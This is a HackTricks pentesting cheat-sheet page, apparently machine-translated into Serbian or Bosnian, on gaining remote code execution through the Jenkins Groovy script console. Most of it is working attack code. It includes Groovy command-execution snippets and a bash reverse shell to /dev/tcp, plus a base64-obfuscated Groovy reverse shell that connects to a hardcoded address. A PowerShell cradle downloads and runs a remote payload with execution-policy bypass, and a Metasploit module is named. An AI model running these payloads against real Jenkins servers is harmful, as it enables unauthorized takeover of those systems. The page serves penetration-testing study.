Jenkins RCE with Groovy Script

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Jenkins RCE sa Groovy skriptom

Ovo je manje bučno od kreiranja novog projekta u Jenkins-u

  1. Idite na path_jenkins/script

  2. Unesite skriptu u tekstualno polje

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Možete izvršiti komandu koristeći: cmd.exe /c dir

U linuxu možete koristiti: "ls /".execute().text

Ako trebate koristiti navodnike i jednostruke navodnike unutar teksta, možete koristiti """PAYLOAD""" (trostruki dvostruki navodnici) za izvršavanje payloada.

Još jedan koristan groovy skript je (zamijenite [UMETNITE KOMANDU]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell u Linux-u

Reverse shell je tehnika koja omogućava hakeru da preuzme kontrolu nad udaljenim računarom putem mreže. U Linux okruženju, možete koristiti sledeći kod za uspostavljanje reverse shell-a:

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Zamijenite <IP> sa IP adresom napadača i <PORT> sa odgovarajućim portom koji želite koristiti za komunikaciju.

Nakon što se reverse shell uspostavi, napadač će moći izvršavati komande na udaljenom računaru i preuzeti kontrolu nad njim. Ova tehnika se često koristi u pentestiranju i hakiranju, pa je važno da se koristi samo u zakonite svrhe i uz dozvolu vlasnika sistema.

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell u Windows-u

Možete pripremiti HTTP server sa PS reverse shell-om i koristiti Jeking da ga preuzme i izvrši:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Skripta

Možete automatizovati ovaj proces pomoću ove skripte.

Možete koristiti MSF da dobijete obrnutu ljusku:

msf> use exploit/multi/http/jenkins_script_console
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated